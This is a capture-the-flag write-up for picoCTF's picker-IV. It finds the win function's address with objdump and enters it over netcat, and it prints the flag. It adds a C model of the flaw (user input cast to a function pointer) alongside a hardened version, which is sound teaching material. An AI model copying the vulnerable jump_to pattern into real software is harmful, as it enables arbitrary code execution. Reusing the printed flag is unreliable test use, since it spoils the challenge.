Challenge Overview
Can you figure out how this program works to get the
flag?
Connect to the program with netcat:
$ nc saturn.picoctf.net 56193
The program's source code can be downloaded here.
The binary can be downloaded here.
Solution
Source code: wget https://artifacts.picoctf.net/c/529/picker-IV.c
Binary: wget https://artifacts.picoctf.net/c/529/picker-IV
Either read the source (cat picker-IV.c) or compile and run it (gcc picker-IV.c, then ./a.out) to see what the program does: it prompts for an address in hex and then jumps to whatever address you typed. Nothing checks that the address points at anything sensible, so the plan is to hand it the address of the win function, which prints the flag.
objdump -D picker-IV | less
In less, type / followed by win to search the disassembly for the win function. Its symbol line, 000000000040129e <win>:, gives the address, 0x40129e. The address is usable as-is because the binary is not position-independent: a PIE build would show small offsets such as 0x1xxx in objdump and would be loaded at a different base on every run.
nc saturn.picoctf.net 56193
At the prompt, enter the function address in hex without the 0x prefix, i.e. 40129e. The program jumps to that address, execution lands in win, and win prints the flag.
Flag: picoCTF{n3v3r_jump_t0_u53r_5uppl13d_4ddr355...1af4}
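To make the mechanic concrete, here is an added example in C. It is not the challenge's source (which this page does not reproduce): it models the program as reading a hex string, converting it with strtoull in base 16 (which, like scanf's %x, also accepts an optional 0x prefix), casting the integer to a function pointer and calling it, next to a hardened version that lets the user pick from a fixed table by index instead. The names parse_hex_addr, jump_to, safe_pick, solve and the menu table are this example's own assumptions, and win returns a marker value instead of reading flag.txt so it runs anywhere.

```c
// Added example, not the picker-IV source: a minimal model of "read a hex
// address from the user and jump to it", plus the fix. Function names and
// the menu table are this example's own.
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The target the solver wants to reach. Returns a marker instead of
   dumping flag.txt so the example is self-contained. */
int win(void) {
    puts("You won!");
    return 1337;
}

int lose(void) {
    puts("Nothing here.");
    return 0;
}

/* Parse a hex address the way scanf("%x") / strtoul(..., 16) do: an
   optional 0x prefix is accepted, so "40129e" and "0x40129e" are equal.
   Sets *ok to 0 and returns 0 if the string is not a clean hex number. */
uintptr_t parse_hex_addr(const char *s, int *ok) {
    char *end = NULL;
    unsigned long long v = strtoull(s, &end, 16);
    *ok = (end != s && *end == '\0');
    return *ok ? (uintptr_t)v : 0;
}

/* The vulnerable pattern: whatever number the user typed becomes a code
   pointer. Nothing checks that it points at a function at all. */
int jump_to(uintptr_t addr) {
    int (*fn)(void) = (int (*)(void))addr;
    return fn();
}

/* Hardened form: the user chooses from a fixed table by index, so the
   pointer never comes from input, and out-of-range picks are rejected. */
static int (*const menu[])(void) = { lose, win };

int safe_pick(long idx) {
    if (idx < 0 || idx >= (long)(sizeof menu / sizeof menu[0]))
        return -1;
    return menu[idx]();
}

/* What the solver does: take win's address as objdump prints it (hex,
   no 0x), feed it back through the parser, and the jump lands in win. */
int solve(void) {
    char buf[32];
    int ok;
    snprintf(buf, sizeof buf, "%lx", (unsigned long)(uintptr_t)win);
    return jump_to(parse_hex_addr(buf, &ok));
}

int main(void) {
    char line[64];
    int ok;
    printf("Enter the address in hex to jump to, excluding '0x': ");
    if (!fgets(line, sizeof line, stdin))
        return 1;
    line[strcspn(line, "\n")] = '\0';
    uintptr_t addr = parse_hex_addr(line, &ok);
    if (!ok) {
        puts("bad hex");
        return 1;
    }
    printf("You input %lx\n", (unsigned long)addr);
    return jump_to(addr);   /* crashes unless addr really is a function */
}
```

Compile it without PIE (gcc -no-pie) to reproduce the fixed 0x40xxxx addresses seen in the challenge; with a default PIE build the address of win changes on every run, which is exactly why a user-supplied absolute address is only a viable attack against a non-PIE binary.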